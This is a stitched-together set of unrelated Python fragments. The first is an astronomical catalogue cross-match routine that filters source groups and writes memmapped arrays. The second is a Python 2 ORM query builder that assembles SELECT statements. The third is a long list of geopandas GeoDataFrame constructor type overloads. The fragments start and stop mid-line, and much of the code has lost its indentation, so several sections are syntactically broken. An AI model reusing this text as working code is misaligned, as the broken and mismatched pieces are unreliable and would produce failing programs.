# considered, however, we must remove sources near the "empty" strip.
if ax_lims[0] > 0 or ax_lims[1] < 360:
for lon in ax_lims[:2]:
is_within_dist_of_lon = (
hav_dist_constant_lat(a[:, 0], a[:, 1], lon) <= max_sep)
# Progressively update the boolean for each source in the group
# for each distance check for the four extents.
meets_min_distance[:len(a)] = (meets_min_distance[:len(a)] |
is_within_dist_of_lon)
# Similarly, if either "latitude" is set to 90 degrees, we cannot have
# lack of up-down missing sources, so we must check (individually this
# time) for whether we should skip this check.
for lat in ax_lims[2:]:
if np.abs(lat) < 90:
is_within_dist_of_lat = (np.abs(a[:, 1] - lat) <= max_sep)
meets_min_distance[:len(a)] = (meets_min_distance[:len(a)] |
is_within_dist_of_lat)
# Because all sources in BOTH catalogues must pass, we continue
# to update meets_min_distance for catalogue "b" as well.
if ax_lims[0] > 0 or ax_lims[1] < 360:
for lon in ax_lims[:2]:
is_within_dist_of_lon = (
hav_dist_constant_lat(b[:, 0], b[:, 1], lon) <= max_sep)
meets_min_distance[len(a):] = (meets_min_distance[len(a):] |
is_within_dist_of_lon)
for lat in ax_lims[2:]:
if np.abs(lat) < 90:
is_within_dist_of_lat = (np.abs(b[:, 1] - lat) <= max_sep)
meets_min_distance[len(a):] = (meets_min_distance[len(a):] |
is_within_dist_of_lat)
if np.all(meets_min_distance == 0):
passed_check[indexmap[i]] = 1
failed_check[indexmap[i]] = 0
num_good_checks += 1
else:
# While "good" islands just need their total number incrementing
# for the group, "failed" islands we need to track the number of
# sources in each catalogue for.
num_a_failed_checks += len(a)
num_b_failed_checks += len(b)
# If set_list returned any rejected sources, then add any sources too close
# to match extent to those now. Ensure that we only reject the unique source IDs
# across each island group, ignoring the "default" -1 index.
if os.path.isfile('{}/reject/areject.npy'.format(joint_folder_path)):
a_first_rejected_len = len(np.load('{}/reject/areject.npy'.format(joint_folder_path),
mmap_mode='r'))
else:
a_first_rejected_len = 0
if num_a_failed_checks + a_first_rejected_len > 0:
reject_a = np.lib.format.open_memmap(
'{}/reject/reject_a.npy'.format(joint_folder_path), mode='w+', dtype=int,
shape=(num_a_failed_checks+a_first_rejected_len,))
if os.path.isfile('{}/reject/areject.npy'.format(joint_folder_path)):
reject_a[num_a_failed_checks:] = np.load('{}/reject/areject.npy'.format(joint_folder_path),
mmap_mode='r')
os.remove('{}/reject/areject.npy'.format(joint_folder_path))
if os.path.isfile('{}/reject/breject.npy'.format(joint_folder_path)):
b_first_rejected_len = len(np.load('{}/reject/breject.npy'.format(joint_folder_path),
mmap_mode='r'))
else:
b_first_rejected_len = 0
if num_b_failed_checks + b_first_rejected_len > 0:
reject_b = np.lib.format.open_memmap(
'{}/reject/reject_b.npy'.format(joint_folder_path), mode='w+', dtype=int,
shape=(num_b_failed_checks+b_first_rejected_len,))
if os.path.isfile('{}/reject/breject.npy'.format(joint_folder_path)):
reject_b[num_b_failed_checks:] = np.load('{}/reject/breject.npy'.format(joint_folder_path),
mmap_mode='r')
os.remove('{}/reject/breject.npy'.format(joint_folder_path))
di = max(1, len(agrplen) // 20)
amaxlen, bmaxlen = 0, 0
for i in range(0, len(agrplen), di):
if np.sum(passed_check[i:i+di]) > 0:
amaxlen = max(amaxlen, int(np.amax(agrplen[i:i+di][passed_check[i:i+di]])))
bmaxlen = max(bmaxlen, int(np.amax(bgrplen[i:i+di][passed_check[i:i+di]])))
new_alist = np.lib.format.open_memmap(
'{}/group/alist2.npy'.format(joint_folder_path), mode='w+', dtype=int,
shape=(amaxlen, num_good_checks), fortran_order=True)
new_blist = np.lib.format.open_memmap(
'{}/group/blist2.npy'.format(joint_folder_path), mode='w+', dtype=int,
shape=(bmaxlen, num_good_checks), fortran_order=True)
new_agrplen = np.lib.format.open_memmap('{}/group/agrplen2.npy'.format(joint_folder_path),
mode='w+', dtype=int, shape=(num_good_checks,))
new_bgrplen = np.lib.format.open_memmap('{}/group/bgrplen2.npy'.format(joint_folder_path),
mode='w+', dtype=int, shape=(num_good_checks,))
a_fail_count, b_fail_count, pass_count = 0, 0, 0
di = max(1, alist.shape[1] // 20)
for i in range(0, alist.shape[1], di):
# This should, in a memory-friendly way, basically boil down to being
# reject_a = alist[:, failed_check]; reject_a = reject_a[reject_a > -1].
failed_check_cut = failed_check[i:i+di]
alist_cut = alist[:, i:i+di][:, failed_check_cut]
alist_cut = alist_cut[alist_cut > -1]
blist_cut = blist[:, i:i+di][:, failed_check_cut]
blist_cut = blist_cut[blist_cut > -1]
if len(alist_cut) > 0:
reject_a[a_fail_count:a_fail_count+len(alist_cut)] = alist_cut
a_fail_count += len(alist_cut)
if len(blist_cut) > 0:
reject_b[b_fail_count:b_fail_count+len(blist_cut)] = blist_cut
b_fail_count += len(blist_cut)
# This should basically be alist = alist[:, passed_check] and
# agrplen = agrplen[passed_check], simply removing those above failed
# islands from the list, analagous to the same functionality in set_list.
n_extra = int(np.sum(passed_check[i:i+di]))
new_alist[:, pass_count:pass_count+n_extra] = alist[:, i:i+di][:amaxlen,
passed_check[i:i+di]]
new_blist[:, pass_count:pass_count+n_extra] = blist[:, i:i+di][:bmaxlen,
passed_check[i:i+di]]
new_agrplen[pass_count:pass_count+n_extra] = agrplen[i:i+di][passed_check[i:i+di]]
new_bgrplen[pass_count:pass_count+n_extra] = bgrplen[i:i+di][passed_check[i:i+di]]
pass_count += n_extra
for cat_kind in ['a', 'b']:
os.system('mv {}/group/{}list2.npy {}/group/{}list.npy'.format(
joint_folder_path, cat_kind, joint_folder_path, cat_kind))
os.system('mv {}/group/{}grplen2.npy {}/group/{}grplen.npy'.format(
joint_folder_path, cat_kind, joint_folder_path, cat_kind))
os.remove('{}/group/passed_check.npy'.format(joint_folder_path))
os.remove('{}/group/failed_check.npy'.format(joint_folder_path))
return
def _load_fourier_grid_cutouts(a, sky_rect_coords, joint_folder_path, cat_folder_path,
                               auf_folder_path, padding, cat_name, memmap_slice_arrays):
    '''
    Load a rectangular sky cutout of one catalogue's astrometry together
    with the matching sub-array of its perturbation AUF fourier-space PDF.

    Parameters
    ----------
    a : numpy.ndarray
        Array containing the full entries for a given catalogue.
    sky_rect_coords : numpy.ndarray or list
        Rectangular extents of the cutout: lower longitude, upper longitude,
        lower latitude, upper latitude.
    joint_folder_path : string
        Folder on disk for files related to the joint cross-match.
    cat_folder_path : string
        Location on disk of the catalogue files for ``a``.
    auf_folder_path : string
        Folder on disk holding catalogue ``a``'s perturbation AUF components.
    padding : float
        Maximum sky separation allowed the "wrong" side of ``sky_rect_coords``,
        widening the box so all overlaps are caught downstream.
    cat_name : string
        Whether the cutout comes from catalogue "a" or "b".
    memmap_slice_arrays : list of numpy.ndarray
        Memmapped sky-slice arrays used when loading the rectangular patch.
    '''
    lon_lo, lon_hi, lat_lo, lat_hi = sky_rect_coords
    rect_slice = _load_rectangular_slice(joint_folder_path, cat_name, a, lon_lo, lon_hi,
                                         lat_lo, lat_hi, padding, memmap_slice_arrays)
    astro_cutout = np.load('{}/con_cat_astro.npy'.format(cat_folder_path),
                           mmap_mode='r')[rect_slice]
    modrefind = np.load('{}/modelrefinds.npy'.format(auf_folder_path),
                        mmap_mode='r')[:, rect_slice]
    [fouriergrid], modrefindsmall = load_small_ref_auf_grid(modrefind, auf_folder_path,
                                                            ['fourier'])
    return astro_cutout, fouriergrid, modrefindsmall, rect_slice
def _clean_overlaps(inds, size, joint_folder_path, filename):
'''
Convenience function to parse either catalogue's indices array for
duplicate references to the opposing array on a per-source basis,
and filter duplications in the memmapped file.
Parameters
----------
inds : numpy.ndarray
Array containing the indices of overlap between this catalogue, for each
source, and the opposing catalogue, including potential duplication.
size : numpy.ndarray
Array containing the number of overlaps between this catalogue and the
opposing catalogue prior to duplication removal.
joint_folder_path : string
The top-level folder containing the "group" folder into which the
index arrays are saved.
filename : string
The name of the ``inds`` array saved to disk.
Returns
-------
inds : numpy.ndarray
The unique indices of overlap into the opposing catalogue for each
source in a given catalogue, stripped of potential duplicates.
size : numpy.ndarray
Newly updated ``size`` array, containing the lengths of the unique
indices of overlap into the opposing catalogue for each source.
'''
maxsize = 0
size[:] = 0
for i in range(0, inds.shape[1]):
q = np.unique(inds[inds[:, i] > -1, i])
y = len(q)
inds[:y, i] = q
inds[y:, i] = -1
if y > maxsize:
maxsize = y
size[i] = y
# | |
isinstance(clause, (tuple, list)):
flattened.extend(clause)
else:
flattened.append(clause)
return flattened
    def parse_node(self, node, alias_map):
        """Recursively render a query Node tree to (sql_fragment, params).

        Children may be Q objects (field lookups), R objects (raw SQL), or
        nested Nodes; fragments are joined with the node's connector
        (e.g. AND/OR) and wrapped in NOT (...) when the node is negated.
        """
        query = []
        query_data = []
        for child in node.children:
            if isinstance(child, Q):
                parsed, data = self.parse_q(child, alias_map)
                query.append(parsed)
                query_data.extend(data)
            elif isinstance(child, R):
                parsed, data = self.parse_r(child, alias_map)
                # Raw fragments carry one placeholder per parameter; substitute
                # the database's interpolation marker for each.
                query.append(parsed % tuple(self.interpolation for o in data))
                query_data.extend(data)
            elif isinstance(child, Node):
                parsed, data = self.parse_node(child, alias_map)
                # Parenthesise nested sub-trees to preserve precedence.
                query.append('(%s)' % parsed)
                query_data.extend(data)
        connector = ' %s ' % node.connector
        query = connector.join(query)
        if node.negated:
            query = 'NOT (%s)' % query
        return query, query_data
    def parse_q(self, q, alias_map):
        """Render a single Q object to (sql_fragment, params).

        Each lookup becomes "<table_alias>.<column> <operation>"; multiple
        lookups are ANDed and parenthesised, and the whole fragment is
        prefixed with NOT when the Q is negated.
        """
        model = q.model or self.model
        query = []
        query_data = []
        parsed = self.parse_query_args(model, **q.query)
        for (name, lookup) in parsed:
            operation, value = lookup
            if isinstance(value, SelectQuery):
                # Inline a subquery: its SQL is spliced into the operation and
                # its parameters replace the value.
                sql, value = self.convert_subquery(value)
                operation = operation % sql
            if isinstance(value, F):
                # F expressions reference another column, so no parameter is
                # appended — the column reference is embedded in the SQL.
                f_model = value.model or model
                operation = operation % self.parse_f(value, f_model, alias_map)
            else:
                query_data.append(value)
            combined = self.combine_field(alias_map[model], name)
            query.append('%s %s' % (combined, operation))
        if len(query) > 1:
            query = '(%s)' % (' AND '.join(query))
        else:
            # NOTE(review): assumes q.query is non-empty; an empty Q would
            # raise IndexError here.
            query = query[0]
        if q.negated:
            query = 'NOT %s' % query
        return query, query_data
def parse_f(self, f_object, model, alias_map):
combined = self.combine_field(alias_map[model], f_object.field)
if f_object.op is not None:
combined = '(%s %s %s)' % (combined, f_object.op, f_object.value)
return combined
    def parse_r(self, r_object, alias_map):
        """Delegate raw-SQL rendering to the R object itself; ``alias_map``
        is unused here but kept for signature parity with parse_q/parse_f."""
        return r_object.sql_where()
    def convert_subquery(self, subquery):
        """Render a SelectQuery for embedding as a subquery.

        Temporarily rewrites '*' selections to the primary key (a subquery
        must yield a single column) and forces aliasing, then restores the
        subquery's original state before returning (sql, params).
        """
        orig_query = subquery.query
        if subquery.query == '*':
            subquery.query = subquery.model._meta.pk_name
        subquery.force_alias, orig_alias = True, subquery.force_alias
        sql, data = subquery.sql()
        # Restore mutated state so the caller's query object is unchanged.
        subquery.query = orig_query
        subquery.force_alias = orig_alias
        return sql, data
def sorted_models(self, alias_map):
return [
(model, alias) \
for (model, alias) in sorted(alias_map.items(), key=lambda i: i[1])
]
    def sql(self):
        """Return (sql, params) for this query; implemented by subclasses."""
        raise NotImplementedError
    def execute(self):
        """Run the query against the database; implemented by subclasses."""
        raise NotImplementedError
    def raw_execute(self, query, params):
        """Execute *query* with *params* on the bound database, committing
        according to this query class's ``require_commit`` flag."""
        return self.database.execute(query, params, self.require_commit)
class RawQuery(BaseQuery):
    """A query defined entirely by a raw SQL string plus positional params.

    Programmatic composition (join/where/switch) is deliberately unsupported.
    """
    def __init__(self, model, query, *params):
        self._sql = query
        self._params = list(params)
        super(RawQuery, self).__init__(model)

    def clone(self):
        """Return an independent copy sharing the same SQL and params."""
        return RawQuery(self.model, self._sql, *self._params)

    def sql(self):
        """Return the raw (sql, params) pair unchanged."""
        return self._sql, self._params

    def execute(self):
        """Run the raw SQL and wrap the cursor in a QueryResultWrapper."""
        sql, params = self.sql()
        return QueryResultWrapper(self.model, self.raw_execute(sql, params))

    def join(self):
        raise AttributeError('Raw queries do not support joining programmatically')

    def where(self):
        raise AttributeError('Raw queries do not support querying programmatically')

    def switch(self):
        raise AttributeError('Raw queries do not support switching contexts')

    def __iter__(self):
        return iter(self.execute())
class SelectQuery(BaseQuery):
require_commit = False
    def __init__(self, model, query=None):
        """Initialise a SELECT over *model*; *query* defaults to '*' (all columns)."""
        self.query = query or '*'
        self._group_by = []      # list of (model, fields) GROUP BY entries
        self._having = []        # HAVING clauses, ANDed at render time
        self._order_by = []      # list of (model, field, ordering) tuples
        self._limit = None       # LIMIT row count, or None
        self._offset = None      # OFFSET row count, or None
        self._distinct = False   # SELECT DISTINCT flag
        self._qr = None          # cached QueryResultWrapper from execute()
        self._for_update = False # append FOR UPDATE when adapter supports it
        self._naive = False      # skip model-graph reconstruction of rows
        super(SelectQuery, self).__init__(model)
    def clone(self):
        """Return a deep-enough copy of this query.

        List/dict/set state is copied so mutating the clone never affects the
        original; the cached result wrapper ``_qr`` is shared intentionally.
        """
        query = SelectQuery(self.model, self.query)
        query.query_context = self.query_context
        query._group_by = list(self._group_by)
        query._having = list(self._having)
        query._order_by = list(self._order_by)
        query._limit = self._limit
        query._offset = self._offset
        query._distinct = self._distinct
        query._qr = self._qr
        query._for_update = self._for_update
        query._naive = self._naive
        query._where = self.clone_where()
        query._where_models = set(self._where_models)
        query._joined_models = self._joined_models.copy()
        query._joins = self.clone_joins()
        query._table_alias = dict(self._table_alias)
        return query
@returns_clone
def paginate(self, page, paginate_by=20):
if page > 0:
page -= 1
self._limit = paginate_by
self._offset = page * paginate_by
    @returns_clone
    def limit(self, num_rows):
        """Set the LIMIT row count (applied to a clone via @returns_clone)."""
        self._limit = num_rows
    @returns_clone
    def offset(self, num_rows):
        """Set the OFFSET row count (applied to a clone via @returns_clone)."""
        self._offset = num_rows
    @returns_clone
    def for_update(self, for_update=True):
        """Toggle SELECT ... FOR UPDATE (applied to a clone via @returns_clone)."""
        self._for_update = for_update
    def count(self):
        """Return the number of rows this query matches.

        DISTINCT or GROUP BY queries are counted via a wrapping subquery;
        otherwise the selection is rewritten to COUNT(pk) on an
        order-/limit-stripped clone.
        """
        if self._distinct or self._group_by:
            return self.wrapped_count()
        # order_by() with no args clones the query and clears ordering.
        clone = self.order_by()
        clone._limit = clone._offset = None
        if clone.use_aliases():
            clone.query = 'COUNT(t1.%s)' % (clone.model._meta.pk_col)
        else:
            clone.query = 'COUNT(%s)' % (clone.model._meta.pk_col)
        res = clone.database.execute(*clone.sql(), require_commit=False)
        # Fall back to 0 if the cursor yields no row at all.
        return (res.fetchone() or [0])[0]
    def wrapped_count(self):
        """Count rows by wrapping the full query in SELECT COUNT(1) FROM (...).

        Needed when DISTINCT/GROUP BY would make a plain COUNT(pk) wrong.
        """
        clone = self.order_by()
        clone._limit = clone._offset = None
        sql, params = clone.sql()
        query = 'SELECT COUNT(1) FROM (%s) AS wrapped_select' % sql
        res = clone.database.execute(query, params, require_commit=False)
        return res.fetchone()[0]
    @returns_clone
    def group_by(self, *clauses):
        """Append GROUP BY entries (applied to a clone via @returns_clone).

        Each clause may be a field-name string, a list/tuple of names, or a
        Model class (grouping by every field of that model; the model also
        becomes the target for subsequent bare-string clauses).
        """
        model = self.query_context
        for clause in clauses:
            if isinstance(clause, basestring):
                fields = (clause,)
            elif isinstance(clause, (list, tuple)):
                fields = clause
            elif issubclass(clause, Model):
                # NOTE(review): non-class, non-string clauses reach
                # issubclass() and raise TypeError — presumably intentional.
                model = clause
                fields = clause._meta.get_field_names()
            self._group_by.append((model, fields))
@returns_clone
def having(self, *clauses):
self._having = clauses
    @returns_clone
    def distinct(self):
        """Mark the query SELECT DISTINCT (applied to a clone via @returns_clone)."""
        self._distinct = True
    @returns_clone
    def order_by(self, *clauses):
        """Replace the ORDER BY clauses (applied to a clone via @returns_clone).

        Accepted clause shapes:
        - (model, field, ordering) 3-tuple
        - (field, ordering) or (model, field) 2-tuple — disambiguated by
          whether the first element is a string
        - bare field-name string (ordering defaults to 'ASC')
        - Field instance (model and name taken from the field)
        Calling with no arguments clears the ordering on the clone.
        """
        order_by = []
        for clause in clauses:
            if isinstance(clause, tuple):
                if len(clause) == 3:
                    model, field, ordering = clause
                elif len(clause) == 2:
                    if isinstance(clause[0], basestring):
                        model = self.query_context
                        field, ordering = clause
                    else:
                        model, field = clause
                        ordering = 'ASC'
                else:
                    raise ValueError('Incorrect arguments passed in order_by clause')
            elif isinstance(clause, basestring):
                model = self.query_context
                field = clause
                ordering = 'ASC'
            elif isinstance(clause, Field):
                model = clause.model
                field = clause.name
                ordering = 'ASC'
            else:
                raise ValueError('Unknown value passed in to order_by')
            order_by.append(
                (model, field, ordering)
            )
        self._order_by = order_by
    def exists(self):
        """Return True if the query matches at least one row.

        Selects a constant '(1) AS a' limited to one row, so no real columns
        are fetched.
        """
        clone = self.paginate(1, 1)
        clone.query = '(1) AS a'
        curs = self.database.execute(*clone.sql(), require_commit=False)
        return bool(curs.fetchone())
    def get(self, *args, **kwargs):
        """Return the single instance matching the given filters.

        Raises the model's DoesNotExist (with the rendered SQL and params in
        the message) when no row matches. The query context is temporarily
        reset to this query's model and always restored.
        """
        orig_ctx = self.query_context
        self.query_context = self.model
        query = self.where(*args, **kwargs).paginate(1, 1)
        try:
            # Python 2 iterator protocol; StopIteration means no row matched.
            obj = query.execute().next()
            return obj
        except StopIteration:
            # query.sql() returns a (sql, params) 2-tuple, filling both %s.
            raise self.model.DoesNotExist('instance matching query does not exist:\nSQL: %s\nPARAMS: %s' % (
                query.sql()
            ))
        finally:
            self.query_context = orig_ctx
    def filter(self, *args, **kwargs):
        """Django-style filtering; delegates to the module-level filter_query helper."""
        return filter_query(self, *args, **kwargs)
    def annotate(self, related_model, aggregation=None):
        """Annotate rows with an aggregate over *related_model*; delegates to
        the module-level annotate_query helper."""
        return annotate_query(self, related_model, aggregation)
    def aggregate(self, func):
        """Evaluate a single aggregate *func* over the query and return its
        scalar value (ordering is cleared on a clone first)."""
        clone = self.order_by()
        clone.query = [func]
        curs = self.database.execute(*clone.sql(), require_commit=False)
        return curs.fetchone()[0]
    @returns_clone
    def naive(self, make_naive=True):
        """Toggle "naive" result handling — rows are not reassembled into the
        joined-model graph (applied to a clone via @returns_clone)."""
        self._naive = make_naive
    def parse_select_query(self, alias_map):
        """Render the SELECT column list.

        Returns (columns_sql, model_cols, select_params, simple) where
        ``model_cols`` describes each selected column for result wrapping,
        ``select_params`` are parameters embedded in the select clause, and
        ``simple`` is True when exactly one model is queried with only its
        own local columns (enables the fast result path).
        """
        q = self.query
        models_queried = 0
        local_columns = True
        if isinstance(q, (list, tuple)):
            q = {self.model: self.query}
        elif isinstance(q, basestring):
            # convert '*' and primary key lookups
            if q == '*':
                q = {self.model: self.model._meta.get_field_names()}
            elif q in (self.model._meta.pk_col, self.model._meta.pk_name):
                q = {self.model: [self.model._meta.pk_name]}
            else:
                # Arbitrary raw select string: pass through untouched.
                return q, [], [], False
        # by now we should have a dictionary if a valid type was passed in
        if not isinstance(q, dict):
            raise TypeError('Unknown type encountered parsing select query')
        # gather aliases and models
        sorted_models = self.sorted_models(alias_map)
        # normalize if we are working with a dictionary
        columns = []
        model_cols = []
        sparams = []
        for model, alias in sorted_models:
            if model not in q:
                continue
            models_queried += 1
            if '*' in q[model]:
                # Expand a '*' entry in-place into the model's field names.
                idx = q[model].index('*')
                q[model] = q[model][:idx] + model._meta.get_field_names() + q[model][idx+1:]
            for clause in q[model]:
                if hasattr(clause, 'sql_select'):
                    # Aggregate/expression objects render themselves to a tuple.
                    clause = clause.sql_select(model)
                if isinstance(clause, tuple):
                    local_columns = False
                    # Tuple shapes: (template, col, alias, *params) /
                    # (func, col, alias) / (col, alias).
                    if len(clause) > 3:
                        template, col_name, col_alias = clause[:3]
                        cparams = clause[3:]
                        column = model._meta.get_column(col_name)
                        columns.append(template % \
                            (self.safe_combine(model, alias, column), col_alias)
                        )
                        sparams.extend(cparams)
                        model_cols.append((model, (template, column, col_alias)))
                    elif len(clause) == 3:
                        func, col_name, col_alias = clause
                        column = model._meta.get_column(col_name)
                        columns.append('%s(%s) AS %s' % \
                            (func, self.safe_combine(model, alias, column), col_alias)
                        )
                        model_cols.append((model, (func, column, col_alias)))
                    elif len(clause) == 2:
                        col_name, col_alias = clause
                        column = model._meta.get_column(col_name)
                        columns.append('%s AS %s' % \
                            (self.safe_combine(model, alias, column), col_alias)
                        )
                        model_cols.append((model, (column, col_alias)))
                    else:
                        raise ValueError('Unknown type in select query')
                else:
                    # Plain field-name string.
                    column = model._meta.get_column(clause)
                    columns.append(self.safe_combine(model, alias, column))
                    model_cols.append((model, column))
        return ', '.join(columns), model_cols, sparams, (models_queried == 1 and local_columns)
    def sql_meta(self):
        """
        Build the complete SELECT statement for this query.

        :return: a 3-tuple ``(sql, params, query_meta)`` where ``sql`` is the
            assembled SQL string, ``params`` is the flat list of bind
            parameters in placeholder order (select params first, then where
            params), and ``query_meta`` is a dict describing the selected
            columns (``'columns'``), the join graph (``'graph'``) and whether
            this is a 'simple' single-model selection (``'simple'``).
        """
        joins, clauses, alias_map = self.compile_where()
        where, where_data = self.flatten_clauses(clauses)
        table = self.qn(self.model._meta.db_table)
        params = []
        group_by = []
        use_aliases = self.use_aliases()
        if use_aliases:
            # alias the main table so joined tables can reference it unambiguously
            table = '%s AS %s' % (table, alias_map[self.model])
        for model, clause in self._group_by:
            if use_aliases:
                alias = alias_map[model]
            else:
                alias = ''
            for field in clause:
                group_by.append(self.safe_combine(model, alias, field))
        parsed_query, model_cols, sparams, simple = self.parse_select_query(alias_map)
        # select-clause params must come before where-clause params so the
        # final params list matches placeholder order in the SQL string
        params.extend(sparams)
        query_meta = {
            'columns': model_cols,
            'graph': self._joins,
            'simple': simple,
        }
        if self._distinct:
            sel = 'SELECT DISTINCT'
        else:
            sel = 'SELECT'
        select = '%s %s FROM %s' % (sel, parsed_query, table)
        joins = '\n'.join(joins)
        where = ' AND '.join(where)
        group_by = ', '.join(group_by)
        having = ' AND '.join(self._having)
        order_by = []
        for piece in self._order_by:
            model, field, ordering = piece
            if use_aliases:
                alias = alias_map[model]
            else:
                alias = ''
            order_by.append('%s %s' % (self.safe_combine(model, alias, field), ordering))
        # assemble only the clauses that are present, in SQL's required order
        pieces = [select]
        if joins:
            pieces.append(joins)
        if where:
            pieces.append('WHERE %s' % where)
            params.extend(self.convert_where_to_params(where_data))
        if group_by:
            pieces.append('GROUP BY %s' % group_by)
        if having:
            pieces.append('HAVING %s' % having)
        if order_by:
            pieces.append('ORDER BY %s' % ', '.join(order_by))
        if self._limit:
            pieces.append('LIMIT %d' % self._limit)
        if self._offset:
            pieces.append('OFFSET %d' % self._offset)
        if self._for_update and self.database.adapter.for_update_support:
            pieces.append('FOR UPDATE')
        return ' '.join(pieces), params, query_meta
def sql(self):
query, params, meta = self.sql_meta()
return query, params
def execute(self):
if self._dirty or not self._qr:
try:
sql, params, meta = self.sql_meta()
except EmptyResultException:
return []
else:
if self._naive:
meta = None
self._qr = QueryResultWrapper(self.model, self.raw_execute(sql, params), meta)
self._dirty = False
return self._qr
else:
# call the __iter__ method directly
return self._qr
def __iter__(self):
return iter(self.execute())
class UpdateQuery(BaseQuery):
def __init__(self, _model, | |
__init__(self, /, data: pandas.core.series.Series):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "geometry"], Union[shapely.geometry.point.Point, int]
]
],
columns: List[Literal["geometry", "value1"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.range.RangeIndex,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[Literal["FID", "geometry"], Union[shapely.geometry.point.Point, int]]
],
columns: List[Literal["geometry", "FID"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "index", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value1", "index"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[Literal["index", "geometry"], Union[shapely.geometry.point.Point, int]]
],
columns: List[Literal["geometry", "index"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.numeric.Int64Index,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "foo_index", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value1", "foo_index"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["foo_index", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "foo_index"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: geopandas.geodataframe.GeoDataFrame):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value3", "value2", "value1", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value3", "value2", "value1"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.multi.MultiIndex,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value2", "value1", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value2", "value1"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value3", "geometry"], Union[shapely.geometry.point.Point, int]
]
],
columns: List[Literal["geometry", "value3"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value3", "level_1", "first", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value3", "level_1", "first"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["level_1", "first", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "level_1", "first"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value3", "level_1", "level_0", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value3", "level_1", "level_0"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["level_1", "level_0", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "level_1", "level_0"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "index", "geometry"],
Union[shapely.geometry.point.Point, float, int],
]
],
columns: List[Literal["geometry", "value1", "index"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.numeric.Float64Index,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["index", "geometry"], Union[shapely.geometry.point.Point, float]
]
],
columns: List[Literal["geometry", "index"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "centile", "geometry"],
Union[shapely.geometry.point.Point, float, int],
]
],
columns: List[Literal["geometry", "value1", "centile"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["centile", "geometry"],
Union[shapely.geometry.point.Point, float],
]
],
columns: List[Literal["geometry", "centile"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "index", "geometry"],
Union[str, shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value1", "index"]],
):
"""
usage.geopandas: 3
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.base.Index,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[Literal["index", "geometry"], Union[shapely.geometry.point.Point, str]]
],
columns: List[Literal["geometry", "index"]],
):
"""
usage.geopandas: 3
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "datetime", "geometry"],
Union[str, shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value1", "datetime"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["datetime", "geometry"],
Union[shapely.geometry.point.Point, str],
]
],
columns: List[Literal["geometry", "datetime"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: List[Dict[Literal["geometry"], shapely.geometry.point.Point]],
columns: List[Literal["geometry"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.datetimes.DatetimeIndex,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[shapely.geometry.multipoint.MultiPoint, int],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
